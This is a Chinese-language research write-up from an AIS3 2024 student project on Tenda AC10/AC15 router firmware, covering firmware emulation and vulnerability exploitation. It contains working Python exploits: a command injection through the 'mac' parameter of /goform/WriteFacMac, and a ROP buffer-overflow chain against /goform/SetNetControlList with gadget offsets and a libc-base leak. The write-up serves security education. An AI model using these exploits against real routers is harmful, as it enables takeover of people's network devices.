AIS3 2024 - 專題研究成果

AIS3/ Web/ Pwn/ router  |  2024-08-05

AIS3 2024 - 專題研究成果

Author: 堇姬Naup

專題

我是網頁、IoT及軟體安全的A2。
這次是做IoT的漏洞專題,這次是研究Tenda router,研究的型號是AC10、AC15兩個型號,並且嘗試從CVE付現到挖出漏洞,雖然沒有拿最佳專題,但我也學到很多。以下是研究內容

AC10 CVE付現

解firmware

1
binwalk -E US_AC10V1.0RTL_V15.03.06.23_multi_TD01.bin

image
image

看起來沒有加密

直接

1
binwalk -e US_AC10V1.0RTL_V15.03.06.23_multi_TD01.bin

模擬

qemu-mipsel-static

1
2
sudo apt install lib32z1 qemu-user-static
sudo cp $(which qemu-mipsel-static) ./

可以先嘗試模擬

1
sudo chroot ./ ./qemu-mipsel-static ./bin/httpd

image
image

追進WeLoveLinux這個string
分析一下可能會卡幾個東西

image
image

apmit_init()、check_network()、ConnectCfm()

jalr做跳轉到$t9$t9->$v0->apmib_init位置

apmib_init

image
image

09 F8 20 03 -> 01 00 02 24

https://shell-storm.org/online/Online-Assembler-and-Disassembler/
(patch 成 li $v0, 1)

check_network

image
image

09 F8 20 03 -> 01 00 02 24

(patch 成 li $v0, 1)

ConnectCfm

image
image

09 F8 20 03 -> 01 00 02 24

(patch 成 li $v0, 1)

都patch掉了

image
image

1
sudo chroot ./ ./qemu-mipsel-static ./bin/httpd_patch

run起來可以跑了

image
image

網卡

image
image

ip -> g_lan_ip -> br0
find br0 ip & listen br0網路接口ip
所以我們可以加入一個br0橋接網卡,並把網卡ens33加進去,這樣就可以抓到正確的ip

1
2
3
4
5
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0

image
image

成功模擬

image
image

Page not found

webroot重新定向到webroot_ro

1
2
3
rm -rf webroot
sudo ln -s webroot_ro/ webroot

漏洞分析

formDefineTendDa() ->
/goform/WriteFacMac

image
image

可以控mac,doSystemCmd就是可以執行命令,所以有command injection

image
image

pwned!!

image
image

image
image

第一次送請求被redirect掉,所以送兩次

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests

ip = "192.168.247.132"

url = 'http://{}/goform/WriteFacMac'.format(ip)


headers = {
    "Host": "{}".format(ip),
    "Upgrade-Insecure-Requests": "1",
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:104.0)Gecko/20100101 Firefox/104.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
    "Accept-Encoding": "gzip, deflate, br",
    "Accept-Language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.",
    'Cookie': 'password=aaa'
}

file_name = "naup.txt"
cmd = ';echo pwned by NAUP > /webroot/{}'.format(file_name)

payload = {'mac': cmd}
response_get = requests.get(url, headers=headers, params=payload)
response_get = requests.get(url, headers=headers, params=payload)

AC15 漏洞挖掘

Emulation

debug 要裝 gdb-multiarch
arch : arm
binwalk -e 噴 error 的話先裝這個
https://github.com/devttys0/sasquatch

1
2
3
sudo apt install qemu-user-static
terry1234@ubuntu:~/AIS3_2024/Tenda_AC15/_US_AC15V1.0BR_V15.03.05.19_multi_TD01.bin.extracted/squashfs-root$ sudo cp $(which qemu-arm-static) ./
註 : qemu 擺的位置要對

sub_2E420 是 main(),他的啟動畫面跟 AC10 一模一樣,印象中 AC10 是有 symbol 的,可以對著看
IDA Pro ALT + t 可以找字串,找到後看 xref 辨別函數,我猜 AC10 AC15 寫的差不多

patch

image
image

先跳到print WeLoveLinux的地方,看卡在哪

image
image

check network

check network -> 死迴圈 -> sleep

image
image

MOV R3,R0(0030a0e1) -> MOV R3,#1(0130a0e3)

image
image

再回來看發現patch掉了

image
image

ConnectCfm

ConnectCfm->掛掉

image
image

MOV R3,R0(0030a0e1) -> MOV R3,#1(0130a0e3)

image
image

image
image

image
image

網卡

看上方發現抓到的ip不對

追進去看

image
image

ip -> g_lan_ip -> br0
find br0 ip & listen br0網路接口ip
所以我們可以加入一個br0橋接網卡,並把網卡ens33加進去,這樣就可以抓到正確的ip

1
2
3
4
5
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0
sudo brctl addif br0 ens33
sudo ifconfig br0 up
sudo dhclient br0

image
image

1
2
rm -rf webroot
sudo ln -s webroot_ro/ webroot

image
image

1
sudo chroot ./ ./qemu ./bin/httpd_patch

gdb

1
2
3
4
5
sudo chroot ./ ./qemu -g 30000 ./bin/httpd_patch
gdb-multiarch ./bin/httpd_patch
// 進到gdb
target remote :30000
c //可以看到開始跑

image
image

attack

image
image

1
2
readelf -a ./lib/libc.so.0 | grep "system"
ROPgadget -a ./lib/libc.so.0
gadget address
libc system offset 0x0005a270
pop {r3, pc} 0x00018298
mov r0, sp ; blx r3 0x00040cb8

sub_2E9EC() ->
/goform -> 下方有define追進去

image
image

/SetNetControlList (可以專注找set開頭之類的,因為比較有機會可以跟他互動)

image
image

追進去

image
image

list傳入 -> 資料進到sub_7DD20
進到

strcpy

image
image

往上追發現dest固定大小並且在rbp-0x260,可以buffer overflow

image
image

1
2
3
4
gdb-multiarch ./bin/httpd_patch
target remote :30000
b *0x5AD3C
c

利用

1
2
3
4
pop {r3, pc}
system address
mov r0, sp ; blx r3
cmd

pop掉後
r3 -> system
pc(rip的概念) -> mov r0, sp ; blx r3 gadget address
接下來會跳轉到pc的位置,跳到gadget
mov r0, sp ; blx r3

到這裡時候,sp(rsp -> stack頂部)拿出cmd,放入r0
blx r3跳進去system

get shell

leak libc

首先qemu的vmmap不能用,所以要找其他方式找
另外qemu每次模擬libc base都一樣

這邊我有在想,如果是在實體機的狀況要怎麼辦,查了一些資料後發現,這個情況下,與CTF不同,通常crash掉後機器重啟libc base與之前相同,所以可以嘗試爆破libc base作為手段,另外也可以利用其他information leak相關洞來leak libc

image
image

這裡有puts先跳進去,讓GOT有libc位置,然後進看

1
2
b *0x0002E4FC #下斷點
c

image
image

image
image

puts經過ASLR後address(0x3fdd1cd4)-puts offset(0x35cd4) = 0x3fd9c000(libc base)

image
image

exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests
from pwn import *

ip = "192.168.247.132"
url = "http://{}/goform/SetNetControlList".format(ip)

libc_base = 0x3fd9c000

command = b"echo pwned by NAUP"

system_libc = libc_base + 0x5a270
mov_r0_sp_blx_r3 = libc_base + 0x40cb8
pop_r3_pc = libc_base + 0x18298

payload = b'a'*0x260 + p32(pop_r3_pc) + p32(system_libc) + p32(mov_r0_sp_blx_r3) + command

cookie = {"Cookie":"password=naup"}
data = {"list": payload}

response = requests.post(url, cookies=cookie, data=data)
response = requests.post(url, cookies=cookie, data=data)

pwned

image
image

簡報

以下是我的簡報連結

https://www.canva.com/design/DAGMxyN3Vps/PEbWMzWHG4STGPuQHgkKdQ/edit?utm_content=DAGMxyN3Vps&utm_campaign=designshare&utm_medium=link2&utm_source=sharebutton

Expand all Back to top Go to bottom